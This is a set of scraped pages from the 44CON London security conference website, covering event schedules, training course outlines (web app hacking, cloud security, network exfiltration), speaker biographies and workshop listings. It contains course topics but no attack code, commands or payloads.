          Training tickets are available until we run out of seats or the 8th of March. There are hardly any seats left, so sales may close before the 8th. Book your seat now.

          Tuesday 12th March – Training

          Once again, doors open at 08:15 GMT. We’ll have breakfast snacks and coffee to keep you going, and lunch is provided in the restaurant.

          Wednesday 13th March – 44CONnect

          If you have an invite to 44CONnect, you’ll get an email telling you where it is. If you don’t, and want one, the easiest way is to book a seat on Rory’s course, or to email us if you’ve bought an Early Bird ticket.

          Doors open from 09:30 – 10:00 for a 10:00 start. Here’s the current schedule (subject to change):

          10:00 – Rory McCune – Container Security
          11:00 – Owen Shearing & Will Hunt – Exploiting in.security
          12:00 – Lightning talk round for attendees
          12:30 – Lunch (included for training attendees only)
          14:00 – Steve Lord – Let The Right One In: Enterprise Containerized Honeyclouds
          15:00 – Dave Ryan – Reporting is dead. Long live reporting.

          From 16:00 we’ll have an open drinks tab, then open the space up to the public from 17:00. If you don’t have an invite, drop @stevelord a DM on twitter around 16:00 and he’ll let you know where to go.

          Thursday 14th March – CRESTCon

          We’re really excited about CRESTCon. 5 Lucky people won CRESTCon tickets through our competition. We’ll have a table there with a new sticker design, so come over and say hello!

          As well as tickets, we’ll be there to answer questions about our CFP, talk about training and of course, check out the talks.

          CRESTCon takes place at the Royal College of Physicians, 11 St Andrews Pl, Regent’s Park, London NW1 4LE. Tickets cost £175 and are available from the CRESTCon site.

          #####EOF##### Facebook
          Log into your Facebook account to share.
          Create New Account
          #####EOF##### About 44CON – 44CON

          About 44CON

          What is 44CON?

          44CON is an Information Security Conference & Training event taking place in London. Designed to provide something for the business and technical Information Security professional.

          Why do 44CON?

          To bring the best in international Security training + speaking (as well as the best of local talent) to the UK at a reasonable cost.

          44CON is located in London, which allows for a wide variety of security professionals to attend from the UK, Europe and further afield.

          At the bigger conferences, getting time with top class security speakers is limited. At 44CON, you have great access to speakers, who are all willing to spend time and talk about their work. This is where interesting partnerships can occur.

          Don’t just take our word for it, check out what others have said about the conference on our media coverage page.

          Who’s behind it?

          Sense/Net Ltd is the company the holds the IP for 44CON. Sense/Net is an events management company set up by Adrian and Steve to run conferences and events. Our flagship conference, 44CON is a public event bringing together the best in UK and International information security research and networking opportunities. If you would like an internal conference for your organisation, or have a requirement for a bespoke event please contact us to discuss your requirement and how we can help.

          Leave a Reply

          #####EOF##### Web App Hacker’s Handbook: Live Edition – 44CON

          Web App Hacker’s Handbook: Live Edition

          Presented By: Marcus Pinto and Aaron Devaney, MDSec

          The Web Application Hacker’s Handbook (WAHH) Series is the most deep and comprehensive general purpose guide to hacking web applications that is currently available. This course is a practical opportunity to take the skills and theory taught in the book to the next level, experimenting with all of the tools and techniques against numerous vulnerable web applications and labs, under the guidance of the book’s authors. The course also includes new material from the second edition of WAHH, bringing the course right up to date with the latest attacks.

          The 2 day course will take place on the 10th & 11th September 2019 at the Novotel London West
          Cost is £ 1,300 (inc VAT). Buy your place in our shop now.

          Course Outline

          The course follows the contents of WAHH, with a strong focus on practical techniques:

          • Overview of web application security (chapters 1-3)
          • Mapping the application and its attack surface (chapter 4)
          • Bypassing client-side controls (chapter 5)
          • Attacking core security mechanisms: authentication, session handling, access controls (chapters 6-8)
          • Using automation to enhance manual testing (chapter 13)
          • Injecting code and other input-based attacks (chapters 9-10)
          • Attacking application logic (chapter 11)
          • Attacking other users (chapter 12)

          We will cover a huge range of attacks and techniques, focusing on arming you up with methods and capability to target the vast cocktail of technologies and situations:

          • Injection techniques and methodology to target any language (XXE, SQL, LDAP, JavaScript)
          • Writing Burp Extensions, Burp Macros and other tips to automate your work further and test ‘untestable’ web apps
          • Exploiting seemingly “low risk” issues to achieve full application compromise
          • Understanding JWT, SAML, and API testing
          • Turning theoretical attacks into practical exploits
          • The latest attack techniques which have been developed in recent months
          • And much more …The course employs a range of demo applications and lab exercises, containing hundreds of different examples of web application vulnerabilities.

          This course itself is CREST approved and listed as helpful towards CCT APP.

          Student Requirements

          Delegates should be able to meet the following:

          • Familiarity using an intercepting proxy
          • Understanding of basic concepts such as the HTTP protocol, session management, and basic HTML.
          • Computers capable of running Burp Suite (www.portswigger.net). Note that attendees should have
          • administrative access on these machines in order to set IP addresses, modify hosts files and install software.

          What to Bring

          • A version of the JRE, capable of running Burp Suite.
          • An Ethernet connection.
          • Administrative access to the laptop, and the ability to install a few tools, and disable personal firewalls or virus scanners should they get in the way of the lab exercises.

          We strongly recommend a personal laptop – if your corporate laptop build is too restrictive this may affect your ability to participate in the course fully.

          About the Trainer

          Marcus Pinto is internationally recognised as a leader in the application and database security field, having spent the last nine years in Information Security both as a consultant and as an end user responsible for a global team securing over 200 build tracks and 50+ externally facing applications. He has delivered training to some of the most high-profile audiences, at 44CON, BlackHat, SyScan, and Hack in the Box. Privately he has run training for many technical audiences including CESG’s penetration testing team.

          Marcus also sat on the assessors panel providing input for the CREST Web Application Exam, the UK’s number one certification for application assessment.

          Book your 44CON 2019 training course now!

          #####EOF##### Cloud Security and DevSecOps Workshop – 44CON

          Cloud Security and DevSecOps Workshop

          Presented By: Paul Schwarzenberger

          Public cloud services are now mainstream, and growing at a massive rate, as organisations launch new applications in the cloud and migrate existing systems. Along with the rapid move to the cloud, there is an equally revolutionary shift to DevOps, infrastructure as code, and adoption of agile software development approaches.

          Taken together, broad access to public cloud services, combined with the dynamic nature of DevOps, introduces a multitude of new risks, methods of attack and potential security issues.

          This course provides a hands-on introduction to cloud security and DevSecOps, covering new attack vectors and risks, common mistakes and misconfigurations. Methods of protecting applications and data in the cloud are explored, ranging from secure cloud architectures, to security tests integrated to continuous integration pipelines, cloud security services, continuous cloud compliance, and automated cloud security operations.

          The 2 day course will take place on the 6th & 7th June 2019 in London.
          The price is £1,300 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Knowledge of AWS and Azure services, secure architectures and best practice
          • Hands-on experience of AWS and Azure security features and services
          • Understanding DevSecOps approaches, technologies and tools
          • Practical use of CI/CD pipelines incorporating security testing
          • Container and serverless architectures, security issues and controls

          Course Outline

          Day 1:

          • Introduction and cloud concepts
          • AWS core services
          • AWS lab – build serverless web site using CloudFormation template
          • AWS security services
          • Azure core services
          • Azure lab – deploy infrastructure and implement security improvements

          Day 2:

          • Azure security services
          • Continuous compliance and automated assessment tools
          • Continuous compliance lab – assess security of an AWS account
          • Container concepts, architectures and container security
          • Serverless architectures, serverless functions, security risks and best practice
          • DevOps and DevSecOps
          • DevSecOps lab – CI/CD pipeline for serverless application with integrated tests

          Target Audience

          Security engineers, security architects, security operations and DevOps looking to develop their understanding of cloud security and DevSecOps with a view to designing secure systems, preventing attacks, detecting security issues and establishing automated remediation.

          Penetration testers, ethical hackers and red team personnel interested in extending their knowledge of cloud security risks and issues, common misconfigurations which can be exploited, and the use of automated tools to assess security of cloud infrastructure and applications.

          Student Requirements

          No particular experience required, however any knowledge of cloud will be beneficial.

          What to Bring

          • Laptop with Amazon Workspaces client installed (see below)
          • Mobile phone (for authenticator app)

          Software Requirements

          Before coming on the course, download and install the Amazon Workspaces client on your laptop from https://clients.amazonworkspaces.com/.

          After installing, open the application while connected to home WiFi or a mobile network. Press the Network status symbol at the bottom right hand corner to view detailed status. Ensure that all items have a green tick as shown in the screenshots below.

           

           

           

           

           

           

           

          Also please install the Google Authenticator app on your smartphone.

          Students will be provided with

          Amazon Workspaces virtual desktops for the labs, with all necessary software and tools preinstalled

          AWS, Azure and GitHub credentials to be used responsibly during the course

          Electronic copies of the course presentations, electronic and paper copies of lab guides

          About the Trainer

          Instructor – Paul Schwarzenberger @paulschwarzen

          Paul is a cloud security architect and DevSecOps specialist with over 15 years experience leading a wide range of security related engagements for customers across sectors including financial services, pharmaceutical, retail, education and media, logistics, UK Government and Police.  

Paul uses an agile DevSecOps approach to lead the implementation and migration of critical systems to public cloud, with demanding security and compliance requirements for protection of personal data, detection and prevention of cyber-attacks and financial fraud.

          Recent conference presentations include:

          • Security BSides London 2018 – How to take over a production system in the cloud
          • DevSecCon London 2018 – A journey to continuous cloud compliance
          • IISP CrestCON 2018 – Why cloud security is different

          Paul has numerous security qualifications, certifications and memberships including MSc Information Security Royal Holloway, M.Inst.ISP, CCSP, CISSP and AWS Certified Security Specialty.

          Book your 44CON June 2019 training course now!

          #####EOF##### In & Out – The Network Data Exfiltration Techniques Training – 44CON

          In & Out – The Network Data Exfiltration Techniques Training

          Presented By: Leszek Miś

          The In&Out Network Exfiltration Techniques training class has been designed to present students the modern and emerging tools and techniques available for network data exfiltration, testing and bypassing DLP/IDS/IPS/FW systems, protocol tunneling, hiding, pivoting and generating malicious network events. Highly technical content and only a hands-on practical approach guarantees that the usage of this transferred knowledge & technologies in real production environments will be easy, smooth and repeatable.

          As for the introduction we will cover the latest APT-style campaigns using malware samples, analyze the top C2 network communication techniques seeing in the wild and map the findings directly to ATT&CK Framework, kill chain methodology and defense in depth strategy. We will also go slightly(with live examples OFC!) through the importance of network baselining, memory forensics, automated malware analysis systems and finally the real threat simulation tactics which are the key important aspects of this training.

          Next, we will deep dive into the individual network protocols, services and techniques commonly in use by adversaries in corporate networks and discuss the characteristic security detection features. Using available set of tools (more than 50 different tools and frameworks – check the Keywords section list below), the student will play one by one with well prepared exfiltration, pivoting and tunneling use-cases to generate the true network symptoms of modern attacker behavior.

          This 3 day course will take place on the 9th, 10th and 11th of September 2019 in London.
          The price is £1,950 (inc VAT). Book your place in our shop now.

          Learning Objectives

          • Run different types of TCP/UDP reverse and bind shells across Windows and Linux systems, pivot to the next subnets, configure a port forwarding & proxying and find what are the network traffic artifacts of such actions
          • Manually generate malicious packets, ex. to saturate a DHCP server using Python, flood the network service from C code or start a BF by using hydra or medusa
          • Generate your own malicious payloads and raw TCP/UDP custom encrypted traffic channels undetectable by security products
          • Simulate DNS DGA traffic, run a DNS TXT tunnels and remote shells, exfiltrate data using DNS MX and how to gain the Internet connection on the plane or in the hotel for free!
          • Clone, armor and phish popular websites
          • Big file ICMP packet dripping covert channel and monitor ICMP traffic
          • Use different HTTP headers and methods for stealing data with combination of web application injection techniques and walk through the world of webshells
          • Detect and understand TLS/SSL-based anomalies and exfiltration methods
          • Run Powershell scripts in post-exploitation stage for leaking the data and bypass AV/EDR
          • Cheat security platforms by running internal WMI, Websockets, VOIP or P2P covert channels
          • Hide stolen data in binary file, WAV file, Image file or exfiltrate data from air-gapped system using hops
          • Configure the station to connect to anonymizers like external VPN, TOR, Open proxy and ‘ping’ to the IP/domains tagged on globally recognized security feeds, rules or phishy lists
          • Use popular cloud-based services for C2 communication and data stealing, ex. Pastebin, Twitter, AWS and many more
          • Replay malicious PCAP files and in terms of network behaviour and analyze the malware samples using Cuckoo
          • The syntax of signature-based rules works, how Suricata or Bro IDS can help you detect adversary tactics and what are the differences between this two IDS engines
          • And many, many more.

          Course Outline

          1. Introduction
          2. Modern RAT’s implementation and popular APT&C2 malware communication design – real use cases
          3. TCP/UDP bind and reverse shells
          4. General bypassing, exfiltration, tunneling, pivoting, proxying and C2 techniques
          5. Cloud-based exfiltration and C2 channels
          6. Windows & Powershell exfiltration tools
          7. Browser Exfiltration
          8. Hopping from air-gapped networks
          9. USB attacks and network exfiltration combo
          10. The art of data hiding → steganography examples
          11. Signature-based event analytics, rule bypassing & malicious network traffic generation:
          12. Adversary simulation moves, actions, tools & automated platforms

          Target Audience

          • Red and Blue team members
          • Security / Data Analytics
          • CIRT / Incident Response Specialists
          • Network Security Engineers
          • SOC members and SIEM Engineers
          • AI / Machine Learning Developers
          • Chief Security Officers and IT Security Directors

          Student Requirements

          • An intermediate level of command line syntax experience using Linux and Windows
          • Fundamental knowledge of TCP/IP network protocols
          • Penetration testing experience performing enumeration, exploiting, and lateral movement is beneficial, but not required
          • Basic programming skills is a plus, but not essential

          What to Bring

          • At least 20GB of free disk space
          • At least 8GB of RAM
          • Students should have the latest Virtualbox installed on their machine
          • Full Admin access on your laptop

          About the Trainer

          Instructor – Leszek Miś (@cr0nym)

          LeszekMiś is the founder of Defensive Security​ and VP, Head of Cyber Security in Collective Sense​ where he is responsible for strategy, business analysis, and technical product security research & feature recommendations. He has over 13 years of experience in IT security market supporting the world’s largest customers in terms of exfiltration simulations and penetration tests, infrastructure hardening and general IT Security consultancy services. Next, to that, he has 10 years of experience in teaching and transferring a deep technical knowledge and his experience. He has trained 500+ students with the average evaluation on a 1-5 scale: 4.9. He is an IT Security Architect with offensive love and recognized expert in enterprise Open Source Security solutions market. Leszek provides network data exfiltration simulation services, web application & infrastructure penetration tests and OSINT. He specializes in low-level Linux/OS hardening and defensive security of web application platforms (ex. think about integration of WAF+BeeF!). He is also known and respected trainer/examiner of Red Hat solutions and author of many IT Security workshops.

          Recent conference presentations include:

          • FloCon 2018 – May the data stay with U!
          • Confidence 2016 – Honey(pot) flavored hunt for cyber enemy
          • PLNOG 2016 – Yoyo! It’s us, packets! Catch us if you can

          Leszek holds security qualifications, certifications and memberships including Offensive Security Certified Professional (OSCP), Red Hat Certified Architect (RHCA), Red Hat Certified Security Specialist (RHCSS), Splunk Certified Architect and Comptia Security+.

          Book your 44CON 2019 training course now!

          #####EOF##### Share a link on Twitter

          Share a link with your followers

          New to Twitter?

          Get instant updates from your friends, industry experts, favorite celebrities, and what's happening around the world.

          What is Twitter? Learn more.

          #####EOF##### Win CRESTCon 2019 Tickets! – 44CON

          Win CRESTCon 2019 Tickets!

          We’ve teamed up with CREST to give everyone the opportunity to win one of 5 (count ’em) CRESTCon 2019 tickets, worth £175 each. If you’ve never been, now’s your chance. If you’ve been before but don’t have a ticket, now’s your chance too!

          CRESTCon is a one-day event organised by CREST, the international certification body for the technical information security market. This year’s CRESTCon is on March 14th at the Royal College of Physicians. If you’re on our 44CON training courses in the same week and/or are coming to 44CONnect, then this is a competition worth taking part in.

          To win a CRESTCon ticket, all you need to do is make sure you’re signed up to our mailing list, and email training@44con.com from the address you’ve registered. To shamelessly stack the cards in favour of training attendees and early bird ticket holders, we’ve sliced our 5 ticket allocation the following way:

          Some of the talks we’re most looking forward to at this year’s CRESTCon include:

          • Matt Lorentzen – Sheepl – Automating people for Red and Blue Team Tradecraft
          • Thomas V. Fischer – Building a Personal Data Focused Incident Response Plan to Address Breach Notification
          • Martin Jordan – Austerbury: Iranian cyber threat briefing

          Winners will be chosen at random over the course of February. Get your entry in quick because like our early bird tickets, once they’re gone, they’re gone!

          #####EOF##### 44CON 2018 Speakers – 44CON

          44CON 2018 Speakers

          Philippe Arteau

          Philippe ArteauPhilippe is a security researcher working for GoSecure. His research is focused on Web application security. His past work experience includes pentesting, secure code review and software development. He is the author of the widely-used Java static analysis tool Find Security Bugs. He is also a contributor to the static analysis tool for .NET called Security Code Scan. He built many plugins for Burp and ZAP proxy tools: Retire.js, Reissue Request Scripter, CSP Auditor and many others. He presented at several conferences including Black Hat Arsenal, ATLSecCon, NorthSec, Hackfest (QC) and JavaOne.

          Twitter: h3xstream

          Guy Barnhart-Magen

          Guy Barnhart-MagenGuy is a member of the BSidesTLV organizing team and recipient of the Cisco “black belt” security ninja honor – the highest cyber security advocate rank.
          With over 15 years of experience in the cyber-security industry, he has held various positions in both corporates and start-ups.
          He is currently a security research manager at Intel, where he focuses on AI Security, reverse engineering and researching various embedded systems.

          Ezra Caltum

          Ezra CaltumEzra is a cyber-security practitioner, with a passion for reverse engineering, data analysis, and exploitation. He is the leader of the Tel Aviv DC9723 Defcon group and a co-founder and organizer of BSidesTlv. Currently, he works as a Security Research Manager at Intel.

          James Forshaw

          James ForeshawJames is a security researcher in Google’s Project Zero. He has been involved with computer hardware and software security for over 10 years looking at a range of different platforms and applications. With a great interest in logical vulnerabilities he’s been listed as the #1 researcher for MSRC, as well as being a Pwn2Own and Microsoft Mitigation Bypass bounty winner. He has spoken at a number of security conferences including Black Hat USA, CanSecWest, Bluehat, HITB, and Infiltrate. He’s also the author of the book “Attacking Network Protocols” available from NoStarch Press.

          Twitter: @tiraniddo
          Website: tyranidslair.blogspot.co.uk

          Leigh-Anne Galloway

          Leigh-Anne GallowayLeigh-Anne Galloway is a Security Researcher who specializes in the areas of application and payment security. Leigh-Anne started her career in incident response, leading investigations into payment card data breaches. Which is where she discovered her passion for security advisory and payment technologies. She has presented and authored research on ATM security, application security and payment technology vulnerabilities and has previously spoken at DevSecCon, BSides, Hacktivity, 8dot8, OWASP, Troopers and Black Hat.

          Michael Gianarakis

          Michael GianarakisMichael Gianarakis is the co-founder and CEO of Assetnote, a platform for continuous monitoring of your external attack surface. Michael has presented at various industry events and meetups including DEF CON, Black Hat Asia, Thotcon, Rootcon and Hack in the Box. Michael is also actively involved in the local security community in Australia where he is one of organizers of the monthly SecTalks meetup as well as the hacker camp TuskCon.

          Rancho Han

          Rancho HanRancho Han is a senior security researcher of Tencent Zhanlu Lab (@ZhanluLab). He has more than Seven years of information security experience. In the past, his work involved malware detection, exploit mitigations, and bug hunting. Recently, he focused on the research of windows kernel fuzzing and exploit technique.
          He participated in Pwn2Own 2017 (as Tencent Security Lance Team) and exploited MicroSoft Edge with SYSTEM privilege in less than 1 second. He has also been a speaker at HITB 2018(Amsterdam) and Hitcon 2016(Taipei).

          Jahmel Harris

          JayJarvis-crop-bwJahmel (Jay) is a security researcher and hacker. He co-founded Digital Interruption last year; a security consultancy which helps secure organisations with a mix of penetration testing and helping to embed security into application development pipelines. With a background in not only security testing but software development, Jahmel is able to advise engineers on balancing security with functionality.
          Jahmel has a particular interest in mobile application security, reverse engineering and radio and has presented talks and workshops at home in the UK and abroad. He also runs Manchester Grey Hats – a group aiming to bring hackers together to share knowledge and skills.

          Twitter: @jayHarris_Sec

          Pete Herzog

          pete herzogPete Herzog is the shining example of a hacker trying to fix the world. He built a career out of taking apart the security world piece by piece to figure out how it works (but he still can’t put it back together). Then he writes about it, a lot. You can find articles and projects from him all over the place, especially at the non-profit research organization, The Institute for Security and Open Methodologies (ISECOM), he co-founded in 2001 to help make this happen. There you’ll find his work with the Open Source Security Testing Methodology Manual (OSSTMM), Hacker Highschool, and the Cybersecurity Playbook as well as work in trust metrics, authentication, social engineering, vulnerabilities, risk analysis, and so much more. Pete also teaches training classes, coaches corporations on cybersecurity, analyzes the security for Smart Cities, develops security products, advises start-ups, and hacks things

          Twitter: @peteherzog

          Timo Hirvonen

          -

          Timo has been with F-Secure since 2010. While working in Labs, Timo kept the good guys safe by studying the latest tricks the bad guys used. He specialized in exploit analysis. Timo joined Cyber Security Services in 2016, and nowadays he enjoys protecting the enterprises by working on various types of assessments, including incident response and red team exercises. Timo has presented at INFILTRATE 2018, Black Hat USA 2014, Microsoft Digital Crimes Consortium 2014, CARO 2013, and Scandinavian Cybercrime Conference 2013, and t2 infosec conference.

          Thibault Koechlin

          thibault_koechlin

          After a few years of pentesting and offensive R&D, I turned to defense for new challenges. As a convalescent CSO, I am focusing on defensive R&D with a strong focus on web & FOSS.

           

           

          Matt Lorentzen

          mattlorentzenMatt has 20 years IT industry experience working within government, military, finance, education and commercial sectors. He is a senior security consultant and penetration tester at SpiderLabs with a focus on red team engagements.
          Before joining SpiderLabs, he worked with Hewlett Packard Enterprise as a CHECK Team Leader delivering penetration testing services to a global client list. Prior to HPE, Matt ran his own IT consultancy company for 7 years.

          Twitter : @lorentzenman

          Jack Matheson

          jack matheson-44con

          Jack is a principal engineer at Mellanox Technologies, where he develops software to make networks and data centers more secure. For 15 years, he has been building software/hardware hybrid solutions to accelerate and secure workloads – most recently at McAfee, where he was the chief cloud architect for enterprise security, and Intel, as the software architect for cloud identity.

          Carl Morris

          carl morris

          Carl has over 20 years experience working within IT, over a decade of which was in a global corporate environment starting out as entry level support and working up to System Administration covering the whole breadth of the IT infrastructure, including Active Directory, Exchange, System & Patch Management but with a primary focus and interest on the security related solutions such as firewalls, endpoint security, NAC and general system security. This has been followed by around a decade working in MSSP’s, the latest of which being at SecureData for over 6 years. Initially as an Escalation Engineer followed by moving into Professional Services and subsequently to the Managed Threat Detection team as a Senior Security Analyst where he is now the lead analyst for the Managed Threat Hunting service. Aside from day to day activities the past few months have been spent developing and implementing endpoint capabilities through the use of Sysmon & WEF as well as building detection rules and analytics around that to aid in hunting exercises.

          Twitter Handle: @camorris74

          Willem Mouton

          WillemPhotoWillem is the head of SensePost SecureData Labs – the groups R&D division. Willem is an industry veteran with decades of experience in product development, pentesting, managed services, OSInt and Reconnaissance, security research and most recently Threat Detection and Threat Hunting. He also an experience speaker and trainer with exposure at top international forums like Black Hat.

          Twitter handle: @_w_m__

          Lawrence Munro

          Version 2Lawrence Munro is the Worldwide VP of SpiderLabs, a Post-Graduate Student at Oxford University and a member of the CREST Executive. He regularly presents at conferences on range of topics, but normally: red teaming, education in Infosec or weird side-projects. Lawrence also owns Hackarmoury.com and blogs at Pentesticles.com

          Twitter handle: @munrobotic

          Chen Nan

          Chen NanChen Nan is a Security Researcher at ZhanLu Lab,Tencent. Currently he is focusing on security research about the DXG module in the windows kernel. Previously, he discovered 10+ vulnerabilities in a short period of time. Some of them can be used on the edge’s sandbox escape.

           

          Enrique Nissim

          Enrique Nissim

          Enrique Nissim is a Senior Security Consultant at IOActive. His experience and interests include reverse engineering, exploit development, programming and application security. He has also been a regular speaker at other international cybersecurity conferences, including CansecWest, EKOParty, ZeroNights, and AsiaSecWest.

          Twitter: @kiqueNissim

          David Rogers

          david_rogers_6_512x640David is a mobile phone and IoT security expert, founder and CEO of Copper Horse Solutions Ltd, a software and security company based in Windsor, UK. His company is currently focusing on security and privacy research for the Internet of Things, including connected car security.

          David chairs the Device Security Group at the GSM Association and sits on the Executive Board of the Internet of Things Security Foundation. He is a Visiting Professor in Cyber Security and Digital Forensics at York St John University and teaches Mobile Systems Security at the University of Oxford.

          He has worked in the mobile industry for 20 years in security and engineering roles. Prior to this he worked in the semiconductor industry. His book ‘Mobile Security: A Guide for Users’ was published in 2013. Most recently he authored the UK’s ‘Code of Practice for Security in Consumer IoT Products and Associated Services’, in collaboration with DCMS, NCSC, ICO and industry colleagues.

          Twitter: @drogersuk

          Gabriel Ryan

          Gabriel Ryan - Profile PictureGabriel Ryan is a penetration tester and researcher with a passion for wireless and infr astructure testing. He currently serves a co-founder and principal security consultant for Digital Silence, a Denver based consulting firm that specializes in impact driven penetration testing and red team engagements.

          Prior to joining Digital Silence, Gabriel worked as a penetration tester and researcher for Gotham Digital Silence, contributing heavily to their wireless security practice and regularly performing large scale infrastructure assessments and red teams for Fortune 500 companies. Some of Gabriel’s most recent work includes the development of EAPHammer, an 802.11ac focused tool for breaching WPA2-EAP networks. On the side, he serves as a member of the BSides Las Vegas senior staff, coordinating wireless security for the event. In his spare time, he enjoys producing music, exploring the outdoors, and riding motorcycles.

          Twitter: @s0lst1c3

          Saumil Shah

          saumil_headshot_softSaumil Shah is the founder and CEO of Net-Square, providing cutting edge information security services to clients around the globe. Saumil is an internationally recognised speaker and instructor, having regularly presented at conferences like Blackhat, RSA, CanSecWest, PacSec, EUSecWest, Hack.lu, Hack-in-the-box and others. He has authored two books titled “Web Hacking: Attacks and Defense” and “The Anti-Virus Book”.

          Saumil graduated with an M.S. in Computer Science from Purdue University, USA and a B.E. in Computer Engineering from Gujarat University. He spends his leisure time breaking software, flying kites, traveling around the world and taking pictures.

          Twitter: @therealsaumil

          Shubham Shah

          Shubham Shah - croppedShubham Shah is the co-founder and CTO of Assetnote, a platform for continuous monitoring of your external attack surface. Shubham is a prolific bug bounty hunter in the top 50 hackers on HackerOne and has presented at various industry events including QCon London, Kiwicon, BSides Canberra and WAHCKon. Shubham is also a founder of the charity Hackers Helping Hackers which provides hackers from under-represented and less privileged groups access to industry events, mentorship and training.

          Kevin Sheldrake

          Kevin SheldrakeKevin Sheldrake is a penetration tester and researcher who started working in the technical security field in 1997. Over the years, Kev has been a developer and systems administrator of ‘secure’ systems, an infosec policy consultant, a penetration tester, a reverse engineer and an entrepreneur who founded and ran his own security consulting company. His current interests are tool development for better penetration testing, and he has specialised in IoT and crypto for a number of years.

          He has a Masters degree, is a Chartered Engineer and, in the past, has been a CHECK Team Leader, a CISSP and held CLAS.

          Kev has presented at 44con, Troopers, DEFCON 4420, 441452 and 441392 on RFID crypto (Cracking HiTag2 Crypto); EMF Camp, DEFCON 4420 and 441452 on hacking embedded devices (Inside our Toys); presented on building debuggers for embedded devices at Securi-Tay (Phun with Ptrace()); and also presented a lengthy take down on the use of NLP in Social Engineering at DEFCON 4420 (Social Engineering LIES!). He has also presented regularly at his employer’s internal security conference, winning best talk in 2014 for ‘Embedded Nonsense’, a talk about hacking an IoT device and reversing its crypto, which he subsequently presented at Cyber Security Challenge.

          Twitter: @kevsheldrake
          Website: rtfc.org.uk

          Klaus Schmeh

          Klaus-Schmeh-CFKlaus Schmeh is the world’s leading blogger in the field of crypto history. Klaus’ blog has become the most important online forum for unsolved encryptions and historical ciphers. Even the NSA has forwarded to him inquiries concerning encrypted documents.

          Klaus’ blog readers have proved extremely successful in breaking old cryptograms.

          Klaus Schmeh has published 14 books, 200 articles, 700 blog posts and 20 research papers about encryption technology, which makes him the most-published cryptology author in the world. While he writes his blog in English, most other of his publications are in German.

          As his main profession of security consultant at the German company, cryptovision, Klaus utilizes his special skill in explaining complex technical topics, often using self-drawn cartoons and Lego brick models for visualization.

          Tim Todd

          Tim ToddFrom a background in Reverse Engineering and Algorithm Design, Tim’s past life as a developer had him working on projects as diverse as BIOS & BIST code for Critical Systems through to designing efficient algorithms for Network Load Distribution.

          As a hobbyist, Tim’s passion is modifying embedded firmware; whether it’s his A/V equipment, his phone, or his games console, few things in his house run their original firmware.

          A few years ago Tim ‘jumped the fence’, and currently works as an Embedded Pentester. He is a regular presenter at internal conferences, with talks on Bare-metal R.E., Cryptography, Device Design, and Car Networks.

          If none of that appeals… 1) Why are you here? …2) Come and chat about magic and mentalism; guitars, keyboards, & chord theory; or the more interesting bits of NLP, hypnotism and social engineering.

          Tomi Tuominen

          -

          Tomi is known as the “InfoSec Swiss Army Knife” because when it comes to defending computers, he’s done a little bit of everything. In his more than two decades in the industry, he has taken part in breakthrough research on Windows networking, physical access control systems and electronic voting.
          As F-Secure’s Head of Technical Security Consulting, he specializes in protecting enterprises – often by breaking into them before anyone else can. The founder of the t2 infosec conference, Tomi has thrice been named one of the Top 100 IT Influencers in Finland.

          Chris Wade

          WADE.CHRISChris is a seasoned security researcher and testing consultant. He’s usually got at least one project on the go- for example, reverse engineering hardware, firmware and RF, or fingerprinting USB vulnerabilities with his own fuzzing framework. Another really good example is using Software Defined Radio, with his modded RTL-SDR dongle to sniff radio signals, mainly looking at NFC protocols.

          He also has experience of analysing x86 executables to break protections such as license key requirements, and also for crafting exploits for general buffer overflow vulnerabilities, though this is definitely not as strong as his work analysing the ARM architecture. He’s also pretty good on the guitar.

          Charl van der Walt

          charl van der waltI’m a founder of SensePost – a pentesting company in South Africa and the UK – where I still form part of the management. Over almost 20 years at SensePost I acted in various roles including CEO for about 5 years. After we sold SensePost to a UK business called SecureData I took a diverse role with the group that includes leading its research unit, directing security strategy and also leading the ‘Security Intelligence Unit’, which amongst other things runs a significant Managed SIEM and Threat Hunting (MDR) Operation.

          I have spoken on a variety of occasions over the duration of my career, including at Black Hat, HITB, Defcon, NATA CCDCOE, BSides and others (but never at 44COn).

          I used to have a dog called Fish, but she died. Now I have a dog called Rabbit with three legs.

          Twitter @charlvdwalt

          Julien Voisin

          actor-1296315_640

          Julien (jvoisin) Voisin used to pwn and reverse stuff while contributing to radare2, he nowadays focus on protecting web applications while keeping his own bug alive on websec.fr and writing things on dustri.org. He’s also running some high-speed Tor relay.

          Tim Yunusov

          Timur YunusovTim Yunusov is a Security Expert in the area of banking security and application security. He has authored multiple researches in the field of application security, which include “Apple Pay replay attacks” (Black Hat USA 2017), “7 sins of ATM protection against logical attacks” (PacSec, POC), “Bruteforce of PHPSESSID”, “XML Out-Of-Band” (BlackHat EU), and is rated in the Top Ten Web Hacking Techniques by WhiteHat Security. He regular speaks at conferences and has previously spoken at CanSecWest, Black Hat USA, Black Hat EU, HackInTheBox, Nullcon, NoSuchCon, Hack In Paris, ZeroNights and Positive Hack Days.

          Jie Zeng

          Jie ZengI am a senior security researcher from zhanlu lab of Tencent. I have many years of security research experience, focusing on bug hunting and Exploit technology about Adobe Flash and various browsers.

          In the past few years I have found 30+ vulnerabilities of Adobe Flash player and got 20 CVE number (some of them have won the chrome reward program’s bounty). I am also the winner of the Microsoft Edge project in Pwn2Own 2017(the Team Lance).

          Twitter: @hi_tedJoy

           

           

           

           

           

          %d bloggers like this:
          #####EOF##### 44CON 2016 Workshops – 44CON

          44CON 2016 Workshops

          Thank you to all of our awesome Speakers this year! Grab your ticket in our shop so you don’t miss out on attending these great workshops.

          ARM Shellcode Basics

          cPresented By: Saumil Shah

          A 2 hour workshop on writing ARM Shellcode from scratch. The workshop will cover some simple ARM assembly, and hands-on work with two shellcode examples: a simple execve() shell and a fully working Reverse Shell. This will then be tested with with two ARM exploits.

          Attendees are required to bring in their laptops with a working copy of VMWare (Player/Workstation/Fusion). ARM images running on QEMU will be distributed to the participants.

          Advanced Java Application Code Review

          Presented By:Philippe Arteau

          Modern corporate environments use diverse technologies. Security analysts (code reviewers and pentesters) need to be able to understand how components work under the hoods. This workshop will cover various classes of vulnerabilities with a Java twist. The exercise will be on the code analysis of a custom sample application. The open-source tools Find Security Bugs and SonarQube will be used. This training will cover the following classes of vulnerabilities: XXE (XML eXternal Entity), expression injection, deserialization vulnerability, Path Traversal, HQL injections and XSS.

          Hunting Linux Malware for Fun and $flags

          Presented By: Olivier Bilodeau & Marc-Etienne M.Léveillé

          Server-side Linux malware is a real threat now. Unfortunately, as for its Windows counterpart, most system administrators are inadequately trained or don’t have enough time allocated by their management to analyse and understand the threats that their infrastructures are facing. This tutorial aims at creating an environment where Linux professionals have the opportunity to study such threats safely and in a time-effective fashion.

